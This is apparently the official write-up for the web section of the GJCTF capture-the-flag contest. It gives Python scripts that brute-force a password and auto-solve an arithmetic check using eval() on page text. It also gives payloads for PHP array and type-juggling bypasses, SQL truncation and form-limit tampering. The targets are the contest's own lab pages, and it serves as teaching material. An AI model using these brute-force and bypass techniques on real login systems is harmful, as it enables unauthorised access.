GJCTF 官方WP WEB部分(1)

1.题目链接:http://www.czlgjbbq.top/GJCTF/brute.php

本题推荐使用python来暴力破解密码。脚本如下:

import requests
import re
s = requests.session()
html = s.get('http://www.czlgjbbq.top/GJCTF/brute.php')
session = ""
for i in range(12,28):
    session = session + html.text[i]
session = session.replace(" ","")
for i in range(10000,99999):
    payload = {'password':str(i), 'check':session}
    print payload
    html = s.get(url='http://www.czlgjbbq.top/GJCTF/brute.php', params=payload)
    print(html.text)

注意运行结果,拿到flag.

2、题目链接:http://www.czlgjbbq.top/GJCTF/boom.php

利用数组来绕过加密。
Payload=number1[]=1&number2[]=2

GJCTF 官方WP WEB部分(1)_第1张图片

3、题目链接:http://www.czlgjbbq.top/GJCTF/number_question.php

Payload=num=1ac
利用隐式类型转换绕过。
GJCTF 官方WP WEB部分(1)_第2张图片

4、题目链接:http://www.czlgjbbq.top/GJCTF/re_getflag.php

Payload=key=key1keykeykeykeykey:///111keya@
GJCTF 官方WP WEB部分(1)_第3张图片

5、题目链接:http://www.czlgjbbq.top/GJCTF/login.php

SQL约束攻击,注册传空格就好了。
GJCTF 官方WP WEB部分(1)_第4张图片

6、题目链接:http://www.czlgjbbq.top/GJCTF/inspect.php

GJCTF 官方WP WEB部分(1)_第5张图片
更改maxlength的值。
GJCTF 官方WP WEB部分(1)_第6张图片
传入足够大的值,直接拿到flag。

7、题目链接:http://www.czlgjbbq.top/GJCTF/strcmpass.php

Payload=payload[]=1
利用数组=NULL绕过。
GJCTF 官方WP WEB部分(1)_第7张图片

8、题目链接:http://www.czlgjbbq.top/GJCTF/ihchange.php

GJCTF 官方WP WEB部分(1)_第8张图片
计算十六进制值,保证每一位都不在0到9之间。
Payload=password=0xffeeddaa
GJCTF 官方WP WEB部分(1)_第9张图片

9、题目链接:http://www.czlgjbbq.top/GJCTF/brute2.php

直接通过python脚本来写

import requests
import re
url = 'http://www.czlgjbbq.top/GJCTF/brute2.php'
time = 0
s = requests.session()
while True:
    html = s.get(url)
    pattern = '(\d+.*?\d+)'
    ss = re.search(pattern, html.text)
    info = ss.groups()[0].replace(" ", "")
    password = eval(info)
    html = s.get(url+'?info='+str(password))
    if re.search('GJCTF{.*?}', html.text) is not None:
        print html.text
        break
    time = time + 1
print time

运行后可以直接拿到flag值。

后面几道题的WP将在下次给出。

你可能感兴趣的:(网络安全,网络空间安全)